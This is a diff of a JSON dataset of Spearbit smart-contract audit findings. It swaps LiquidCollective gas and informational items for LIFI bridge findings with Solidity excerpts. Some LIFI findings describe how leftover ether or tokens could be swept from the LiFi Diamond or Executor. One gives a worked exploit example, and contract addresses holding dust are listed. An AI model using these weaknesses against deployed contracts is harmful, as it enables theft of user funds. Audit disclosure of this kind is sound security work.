"https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "OracleV1.isMember can be simplified to save gas.", + "title": "Check slippage of swaps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several bridges check that the output of swaps isn't 0. However, it could also happen that a swap gives a positive output that is still lower than expected due to slippage / sandwiching / MEV. Several AMMs will have a mechanism to limit slippage, but it might be useful to add a generic mechanism, as multiple swaps in sequence might have a relatively large slippage. function swapAndStartBridgeTokensViaOmniBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); if (amount == 0) { revert InvalidAmount(); } _startBridge(_lifiData, _bridgeData, amount, true); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Cache beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch multiplication in to save gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The calculation for _startTime and _endTime uses more multiplication than is necessary.", + "title": "Replace createRetryableTicketNoRefundAliasRewrite() with depositEth()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of the ArbitrumBridgeFacet uses createRetryableTicketNoRefundAliasRewrite().
According to the docs: address-aliasing, this method skips some address rewrite magic that depositEth() does. Normally depositEth() should be used, according to the docs depositing-and-withdrawing-ether. Also this method will be deprecated after nitro: Inbox.sol#L283-L297. While the bridge doesn't do these checks of depositEth(), it is easy for developers who call the LiFi contracts directly to make mistakes and lose tokens. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }(...); } ... ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "_rewardOperators could save gas by skipping operators with no active and funded validators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "_rewardOperators is the River function that distribute the earning rewards to each active operator based on the amount of active validators. The function iterate over the list of active operators returned by OperatorsRegistryV1.listActiveOperators calculating the total amount of active and funded validators (funded-stopped) and the number of active and funded validators (funded-stopped) for each operator. Because of current code, the final temporary array validatorCounts could have some item that contains 0 if the operator in the index position had no more active validators. This mean that: 1) gas has been wasted during the loop 2) gas will be wasted in the second loop, distributing 0 shares to an operator without active and funded valida- tors 3) _mintRawShares will be executed without minting any shares but emitting a Transfer event", + "title": "Hardcode or whitelist the Axelar destinationAddress", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions executeCallViaAxelar() and executeCallWithTokenViaAxelar() call a destinationAddress on the destinationChain. This destinationAddress needs to have specific Axelar functions (_execute() and _executeWithToken()) to be able to receive the calls. This is implemented in the Executor. If these functions don't exist at the destinationAddress, the transferred tokens will be lost. /// @param destinationAddress the address of the LiFi contract on the destinationChain function executeCallViaAxelar(..., string memory destinationAddress, ...) ... { ... s.gateway.callContract(destinationChain, destinationAddress, payload); } Note: the comment \"the address of the LiFi contract\" isn't clear; it could either be the LiFi Diamond or the Executor.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider adding a strict check to prevent Oracle admin to add more than 256 members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "At the time of writing this issue in the latest commit at 030b52feb5af2dd2ad23da0d512c5b0e55eb8259, in the natspec docs of OracleMembers there is a @dev comment that says @dev There can only be up to 256 oracle members.
This is due to how report statuses are stored in Reports Positions If we look at ReportsPositions.sol the natspec docs explains that Each bit in the stored uint256 value tells if the member at a given index has reported But both Oracle.addMember and OracleMembers.push do not prevent the admin to add more than 256 items to the list of oracle members. If we look at the result of the test (located in Appendix), we can see that: It's possible to add more than 256 oracle members. The result of oracle.getMemberReportStatus(oracleMember257) return true even if the oracle member has not reported yet. Because of that, oracle.reportConsensusLayerData (executed by oracleMember257) reverts correctly. If we remove a member from the list (for example oracle member with index 1) the oracleMember257 it will be able to vote because will be swapped with the removed member and at oracle.getMemberReportStatus(oracleMember257) return false. this point 45", + "title": "WormholeFacet doesnt send native token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions of WormholeFacet allow sending the native token, however they dont actually send it across the bridge, causing the native token to stay stuck in the LiFi Diamond and get lost for the sender. contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { function startBridgeTokensViaWormhole(... ) ... payable ... { // is payable LibAsset.depositAsset(_wormholeData.token, _wormholeData.amount); // allows native token _startBridge(_wormholeData); ... } function _startBridge(WormholeData memory _wormholeData) private { ... LibAsset.maxApproveERC20(...); // geared towards ERC20, also works when `msg.value` is set // no { value : .... } IWormholeRouter(_wormholeData.wormholeRouter).transferTokens(...); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "ApprovalsPerOwner.set does not check if owner or spender is address(0).", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "When ApprovalsPerOwner value is set for an owner and a spender, the addresses of the owner and the spender are not checked against address(0).", + "title": "ArbitrumBridgeFacet does not check if msg.value is enough to cover the cost", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The ArbitrumBridgeFacet does not check whether the users provided ether (msg.value) is enough to cover _amount + cost. If there are remaining ethers in LiFis LibDiamond address, exploiters can set a large cost and sweep the ether. function _startBridge( ... ) private { ... uint256 cost = _bridgeData.maxSubmissionCost + _bridgeData.maxGas * _bridgeData.maxGasPrice; if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }( ... ); } else { gatewayRouter.outboundTransfer{ value: cost }( ... 
); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Quorum could be higher than the number of oracles, DOSing the Oracle contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of Oracle.setQuorum only checks if the _newQuorum input parameter is not 0 or equal to the current quorum value. By setting a quorum higher than the number of oracle members, no quorum could be reached for the current or future slots.", + "title": "Underpaying Optimism l2gas may lead to loss of funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The OptimismBridgeFacet uses Optimisms bridge with user-provided l2gas. function _startBridge( LiFiData calldata _lifiData, BridgeData calldata _bridgeData, uint256 _amount, bool _hasSourceSwap ) private { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.depositETHTo{ value: _amount }(_bridgeData.receiver, _bridgeData.l2Gas, \"\"); } else { ... bridge.depositERC20To( _bridgeData.assetId, _bridgeData.assetIdOnL2, _bridgeData.receiver, _amount, _bridgeData.l2Gas, \"\" ); } } Optimisms standard token bridge makes the cross-chain deposit by sending a cross-chain message to L2Bridge. L1StandardBridge.sol#L114-L123 17 // Construct calldata for finalizeDeposit call bytes memory message = abi.encodeWithSelector( IL2ERC20Bridge.finalizeDeposit.selector, address(0), Lib_PredeployAddresses.OVM_ETH, _from, _to, msg.value, _data ); // Send calldata into L2 // slither-disable-next-line reentrancy-events sendCrossDomainMessage(l2TokenBridge, _l2Gas, message); If the l2Gas is underpaid, finalizeDeposit will fail and user funds will be lost.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "ConsensusLayerDepositManager.depositToConsensusLayer should be called only after a quorum has been reached to avoid rewarding validators that have not performed during the frame", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Alluvial is not tracking timestamps or additional information of some actions that happen on-chain like when operator validator is funded on the beacon chain. when an operator is added. when validators are added or removed. when a quorum is reached. when rewards/penalties/slashes happen and which validator is involved. and so on... 46 By not having these enriched informations it could happen that validators that have not contributed to a frame will still get rewards and this could be not fair to other validators that have contributed to the overall balance by working and bringing rewards. Let's make an example: we have 10 operators with 1k validators each at the start of a frame. At some point during the very end of the frame validato_10 get approved 9k validators and all of them get funded. Those validators only participated a small fraction in the production of the rewards. But because there's no way to track these timing and because oracles do not know anything about these (they just need to report the balance and the number of validators during the frame) they will report and arrive to a quorum of reportBeacon(correctEpoch, correctAmountOfBalance, 21_000) that will trigger the OracleManagerV1.setBeaconData. 
The contract check that 21_000 > DepositedValidatorCount.get() will pass and _onEarnings is called. Let's not consider the math involved in the process of calculating the number of shares to be distributed based on the staked balance delta, let's say that because of all the increase in capital Alluvial will call _rewardOperators(1_- 000_000); distributing 1_000_000 shares to operators based on the number of validators that produced that reward. Because as we said we do not know how much each validator has contributed, those shares will be contributed in the same way to operators that could have not contributed at all to the epoch. This is true for both scenarios where validators that have joined or exited the beacon chain not at the start of the epoch where the last quorum was set.", + "title": "Funds can be locked during the recovery stage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The recovery is an address that should receive funds if the execution fails on destination do- main. This ensures that funds are never lost with failed calls. However, in the AmarokFacet It is hardcoded as msg.sender. Several unexpected behaviour can be observed with this implementation. If the msg.sender is a smart contract, It might not be available on the destination chain. If the msg.sender is a smart contract and deployed on the other chain, the contract maybe will not have function to withdraw native token. As a result of this implementation, funds can be locked when an execution fails. 18 contract AmarokFacet is ILiFi, SwapperV2, ReentrancyGuard { ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document the decision to include executionLayerFees in the logic to trigger _onEarnings to dis- tribute rewards to Operators and Treasury", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The setBeaconData function from OracleManager contract is called when oracle members have reached a quorum. The function after checking that the report data respects some integrity check performs a check to distribute rewards to operators and treasury if needed: uint256 executionLayerFees = _pullELFees(); if (previousValidatorBalanceSum < _validatorBalanceSum + executionLayerFees) { _onEarnings((_validatorBalanceSum + executionLayerFees) - previousValidatorBalanceSum); } The delta between _validatorBalanceSum and previousValidatorBalanceSum is the sum of all the rewards, penalties and slashes that validators have accumulated during the validation work of one or multiple frames. By adding executionLayerFees to the check, it means that even if the validators have performed poorly (the sum of rewards is less than the sum of penalties+slash) they could still get rewards if executionLayerFees is greater than the negative delta of newSum-prevSum. 
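(For example, with hypothetical figures: if the validator balance sum dropped by 5 ETH over the frame while 6 ETH of execution layer fees were pulled, the check still passes and _onEarnings(1 ETH) is triggered, minting rewards despite the net validator loss.)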
If we look at the natspec of the _onEarnings it seems that only the validator's balance (without fees) should be used in the if check. 47 /// @notice Handler called if the delta between the last and new validator balance sum is positive /// @dev Must be overriden /// @param _profits The positive increase in the validator balance sum (staking rewards) function _onEarnings(uint256 _profits) internal virtual;", + "title": "What if the receiver of Axelar _executeWithToken() doesnt claim all tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _executeWithToken() approves tokens and then calls callTo. If that contract doesnt retrieve the tokens then the tokens stay within the Executor and are lost. Also see: \"Remaining tokens can be sweeped from the LiFi Diamond or the Executor\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... // transfer received tokens to the recipient IERC20(tokenAddress).approve(callTo, amount); (bool success, ) = callTo.call(callData); ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "When oracle members reach a quorum, the _pushToRiver function is called. Alluvial is performing some sanity check to prevent malicious oracle member to report malicious beacon data. Inside the function, uint256 prevTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); riverAddress.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId)); uint256 postTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot; ,! _sanityChecks(postTotalEth, prevTotalEth, timeElapsed); function _sanityChecks(uint256 _postTotalEth, uint256 _prevTotalEth, uint256 _timeElapsed) internal ,! view { if (_postTotalEth >= _prevTotalEth) { uint256 annualAprUpperBound = BeaconReportBounds.get().annualAprUpperBound; if ( uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) > annualAprUpperBound * _prevTotalEth * _timeElapsed ) { revert BeaconBalanceIncreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, ,! annualAprUpperBound); } } else { uint256 relativeLowerBound = BeaconReportBounds.get().relativeLowerBound; if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) { revert BeaconBalanceDecreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, relativeLowerBound); } ,! } } Both prevTotalEth and postTotalEth call SharesManager.totalUnderlyingSupply() that returns the value from Inside those balance is also included the amount of fees that are pulled from the River._assetBalance(). ELFeeRecipient (Execution Layer Fee Recipient). Alluvial should document how and if funds from the execution layer fee recipient are also considered inside the annualAprUpperBound and relativeLowerBound boundaries. 
48", + "title": "Remaining tokens can be sweeped from the LiFi Diamond or the Executor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The initial balance of (native) tokens in both the Lifi Diamond and the Executor contract can be sweeped by all the swap functions in all the bridges, which use the following functions: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet Although these functions ... swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet have the following code: if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // sometimes transfer tokens in } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } // do swaps uint256 postSwapBalance = LibAsset.getOwnBalance(transferredAssetId); if (postSwapBalance > startingBalance) { LibAsset.transferAsset(transferredAssetId, receiver, postSwapBalance - startingBalance); } This doesnt protect the initial balance of the first tokens, because it can just be part of a swap to another token. The initial balances of intermediate tokens are not checked or protected. As there normally shouldnt be (native) tokens in the LiFi Diamond or the Executor the risk is limited. Note: set the risk to medium as there are other issues in this report that leave tokens in the contracts Although in practice there is some dust in the LiFi Diamond and the Executor: 0x362fa9d0bca5d19f743db50738345ce2b40ec99f 0x46405a9f361c1b9fc09f2c83714f806ff249dae7", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Allowlist.allow allows arbitrary values for _statuses input", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of allow does not check if the value inside each _statuses item is a valid value or not. The function can be called by both the administrator or the allower (roles authorized to manage the user permissions) that can specify arbitrary values to be assigned to the corresponding _accounts item. The user's permissions handled by Allowlist are then used by the River contract in different parts of the code. Those permissions inside the River contracts are a limited set of permissions that could not match what the allower /admin of the Allowlist has used to update a user's permission when the allow function was called.", + "title": "Wormhole bridge chain IDs are different than EVM chain IDs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "According to documentation, Wormhole uses different chain ids than EVM based chain ids. However, the code is implemented with block.chainid check. LiFi is integrated with third party platforms through API. The API/UI side can implement chain id checks, but direct interaction with the contract can lead to loss of funds. 
function _startBridge(WormholeData memory _wormholeData) private { if (block.chainid == _wormholeData.toChainId) revert CannotBridgeToSameNetwork(); } From another perspective, the following line limits the recipient address to an EVM address. If a bridge would be done to a non-EVM chain (e.g. Solana, Terra, Terra Classic), then the tokens would be lost. ... bytes32(uint256(uint160(_wormholeData.recipient))) ... Example transactions below. Chainid 1 Solana Chainid 3 Terra Classic On the other hand, the usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. As previously mentioned, the wormhole destination chain ids are different from standard EVM based chain ids, so the following event can be misinterpreted. ... emit LiFiTransferStarted( _lifiData.transactionId, \"wormhole\", \"\", _lifiData.integrator, _lifiData.referrer, _swapData[0].sendingAssetId, _lifiData.receivingAssetId, _wormholeData.recipient, _swapData[0].fromAmount, _wormholeData.toChainId, // It does not show the correct chain id which is expected by LiFi Data Analytics true, false ); ...", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider exploring a way to update the withdrawal credentials and document all the possible scenarios", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The withdrawal credentials is currently set when River.initRiverV1 is called. The func- tion will internally call ConsensusLayerDepositManager.initConsensusLayerDepositManagerV1 that will perform WithdrawalCredentials.set(_withdrawalCredentials); After initializing the withdrawal credentials, there's no way to update it and change it. The withdrawal cre- dentials is a key part of the whole protocol and everything that concern it should be well documented including all the worst-case scenario What if the withdrawal credentials is lost? What if the withdrawal credentials is compromised? What if the withdrawal credentials must be changed (lost, compromised or simply the wrong one has been submitted)? What should be implemented inside the Alluvial logic to use the new withdrawal creden- tials for the operator's validators that have not been funded yet (the old withdrawal credentials has not been sent to the Deposit contract)? Note that currently there's seem to be no way to update the withdrawal credentials for a validator already submitted to the Deposit contract.", + "title": "Facets approve arbitrary addresses for ERC20 tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "All the facets pointed above approve an address for an ERC20 token, where both these values are provided by the user: LibAsset.maxApproveERC20(IERC20(token), router, amount); The parameter names change depending on the context. So for any ERC20 token that the LifiDiamond contract holds, a user can: call any of the functions in these facets to approve another address for that token. use the approved address to transfer tokens out of the LifiDiamond contract. Note: normally there shouldn't be any tokens in the LiFi Diamond contract so the risk is limited. 
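A minimal hardening sketch (routerAllowlist is a hypothetical storage mapping, analogous to the existing dexAllowlist):

if (!routerAllowlist[router]) revert ContractCallNotAllowed();
LibAsset.maxApproveERC20(IERC20(token), router, amount);

With such a check an approval can only be granted to vetted bridge routers, so a user-supplied token address stays harmless.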
Note: also see \"Hardcode bridge addresses via immutable\"", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Oracle contract allows members to skip frames and report them (even if they are past) one by one or all at once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of reportBeacon allows oracle members to skip frames (255 epochs) and report them (even if they are past) one by one or all at once. Let's assume that members arrived to a quorum for epochId_X. When quorum is reached, _pushToRiver is called, and it will update the following properties: clean all the storage used for member reporting. set ExpectedEpochId to epochId_X + 255. set LastEpochId to epochId_X. With this context, let's assume that members decide to wait 30 frames (30 days) or that for 30 days they cannot arrive at quorum. At the new time, the new epoch would be epochId_X + 255 * 30 The following scenarios can happen: 1) Report at once all the missed epochs Instead of reporting only the current epoch (epochId_X + 255 * 30), they will report all the previous \"skipped\" epochs that are in the past. In this scenario, ExpectedEpochId contains the number of the expected next epoch assigned 30 days ago from the previous call to _pushToRiver. In reportBeacon if the _epochId is what the system expect (equal to Expect- edEpochId) the report can go on. So to be able to report all the missing reports of the \"skipped\" frames the member just need to call in a se- quence reportBeacon(epochId_X + 255, ...), reportBeacon(epochId_X + 255 + 255, ...) + .... + report- Beacon(epochId_X + 255 * 30, ...) 2) Report only the last epoch In this scenario, they would call directly reportBeacon(epochId_X + 255 * 30, ...). _pushToRiver call _sani- tyChecks to perform some checks as do not allow changes in the amount of staked ether that are below or above some bounds. The call that would be made is _sanityChecks(oracleReportedStakedBalance, prevTotalEth, timeElapsed) where timeElapsed is calculated as uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beacon- Spec.slotsPerEpoch * _beaconSpec.secondsPerSlot; So, time elapsed is the number of seconds between the reported epoch and the LastEpochId. But in this scenario, LastEpochId has the old value from the previous call to _pushToRiver made 30 days ago that will be epochId_X. Because of this, the check made inside _sanityChecks for the upper bound would be more relaxed, allowing a wider spread between oracleReportedStakedBalance and prevTotalEth", + "title": "FeeCollector not well integrated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There is a contract to pay fees for using the bridge: FeeCollector. This is used by crafting a transaction by the frontend API, which then calls the contract via _executeAndCheckSwaps(). Here is an example of the contract, and here is an example of such a transaction; it's whitelisted here. This way no fees are paid if a developer is using the LiFi contracts directly. Also it is using a mechanism that isn't suited for this. The _executeAndCheckSwaps() is geared for swaps and has several checks on balances. These (and future) checks could interfere with the fee payments. Also this is a complicated and non-transparent approach. 
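A more explicit integration could use a dedicated fee entry point instead of routing the payment through the swap machinery. A sketch with a hypothetical signature (not the current FeeCollector interface):

function collectFee(address token, uint256 integratorFee, uint256 lifiFee, address integrator) external {
    // pull the fee directly and account for it, instead of encoding the
    // payment as a pseudo-swap inside _executeAndCheckSwaps()
    LibAsset.transferFromERC20(token, msg.sender, address(this), integratorFee + lifiFee);
    ...
}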
The project has suggested to see _executeAndCheckSwaps() as a multicall mechanism.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming OperatorResolution.active to a more meaningful name", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The name active in the struct OperatorResolution could be misleading because it can be confused with the fact that an operator (the struct containing the real operator information is Operator ) is active or not. The value of OperatorResolution.active does not represent if an operator is active, but is used to know if the index associated to the struct's item (OperatorResolution.index) is used or not.", + "title": "_executeSwaps of Executor.sol doesn't have a whitelist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _executeSwaps() of Executor.sol doesn't have a whitelist, whereas _executeSwaps() of SwapperV2.sol does have a whitelist. Calling arbitrary addresses is dangerous. For example, unlimited allowances can be set to allow stealing of leftover tokens in the Executor contract. Luckily, there wouldn't normally be allowances set from users to Executor.sol, so the risk is limited. Note: also see \"Too generic calls in GenericBridgeFacet allow stealing of tokens\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } contract SwapperV2 is ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { LibSwap.SwapData calldata currentSwapData = _swapData[i]; if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } Based on the comments of the LiFi project there is also the use case to call more generic contracts, which do not return any token, e.g., NFT buy, carbon offset. It is probably better to create new functionality to do this.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "lsETH and WlsETH's name() functions return inconsistent name.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "lsETH.name() is River Ether, while WlsETH.name() is Wrapped Alluvial Ether.", + "title": "Processing of end balances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The contract SwapperV2 has the following construction (twice) to prevent using any already present start balance: it gets a start balance, does an action, and if the end balance > start balance it uses the difference; else (which includes start balance == end balance) it uses the end balance. So if the else clause is reached it uses the end balance and ignores any start balance. 
If the action hasn't changed the balances then start balance == end balance and this amount is used. When the action has lowered the balances then the end balance is also used. This defeats the code's purpose. Note: normally there shouldn't be any tokens in the LiFi Diamond contract so the risk is limited. Note: Swapper.sol has similar code. contract SwapperV2 is ILiFi { modifier noLeftovers(LibSwap.SwapData[] calldata _swapData, address payable _receiver) { ... uint256[] memory initialBalances = _fetchBalances(_swapData); ... // all kinds of actions newBalance = LibAsset.getOwnBalance(curAsset); curBalance = newBalance > initialBalances[i] ? newBalance - initialBalances[i] : newBalance; ... } function _executeAndCheckSwaps(...) ... { ... uint256 swapBalance = LibAsset.getOwnBalance(finalTokenId); ... // all kinds of actions uint256 newBalance = LibAsset.getOwnBalance(finalTokenId); swapBalance = newBalance > swapBalance ? newBalance - swapBalance : newBalance; ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Rename modifiers to have consistent naming and patterns only.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The modifiers ifGovernor and ifGovernorOrExecutor in Firewall.sol have a different naming conventions and also logical patterns.", + "title": "Processing of initial balances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The LiFi code base contains two similar source files: Swapper.sol and SwapperV2.sol. One of the differences is the processing of msg.value for native tokens, see pieces of code below. The implementation of SwapperV2.sol sends previously available native tokens to the msg.sender. The following is an exploit example. Assume that: the LiFi Diamond contract contains 0.1 ETH. a call is done with msg.value == 1 ETH and _swapData[0].fromAmount == 0.5 ETH, which is the amount to be swapped. Option 1 Swapper.sol: initialBalances == 1.1 ETH - 1 ETH == 0.1 ETH. Option 2 SwapperV2.sol: initialBalances == 1.1 ETH. After the swap getOwnBalance() is 1.1 - 0.5 == 0.6 ETH. Option 1 Swapper.sol: returns 0.6 - 0.1 = 0.5 ETH. Option 2 SwapperV2.sol: returns 0.6 ETH (so includes the previously present ETH). Note: the implementations of noLeftovers() are also different in Swapper.sol and SwapperV2.sol. Note: this is also related to the issue \"Pulling tokens by LibSwap.swap() is counterintuitive\", because the ERC20 tokens are pulled in via LibSwap.swap(), whereas the msg.value is directly added to the balance. As there normally shouldn't be any token in the LiFi Diamond contract the risk is limited. contract Swapper is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { address asset = _swapData[i].receivingAssetId; uint256 balance = LibAsset.getOwnBalance(asset); if (LibAsset.isNativeAsset(asset)) { balances[i] = balance - msg.value; } else { balances[i] = balance; } } return balances; } } contract SwapperV2 is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { balances[i] = LibAsset.getOwnBalance(_swapData[i].receivingAssetId); } ... 
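// Sketch of the missing correction (assumed fix, mirroring Swapper.sol above):
// for the native asset, subtract msg.value so previously held ETH is not paid out, e.g.
//   if (LibAsset.isNativeAsset(_swapData[i].receivingAssetId)) balances[i] -= msg.value;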
} } The following functions do a comparable processing of msg.value for the initial balance: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet if (!LibAsset.isNativeAsset(transferredAssetId)) { ... } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } However, in Executor.sol the function swapAndCompleteBridgeTokensViaStargate() isn't optimal for ERC20 tokens because ERC20 tokens are already deposited in the contract before calling this function. function swapAndCompleteBridgeTokensViaStargate(... ) ... { ... if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // doesn't correct for initial balance } else { ... } } So assume: 0.1 ETH was in the contract. 1 ETH was added by the bridge. 0.5 ETH is swapped. Then the startingBalance is calculated to be 0.1 ETH + 1 ETH == 1.1 ETH. So no funds are returned to the receiver, as the end balance of 1.1 ETH - 0.5 ETH == 0.6 ETH is smaller than 1.1 ETH. Whereas this should have been (1.1 ETH - 0.5 ETH) - 0.1 ETH == 0.5 ETH.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { 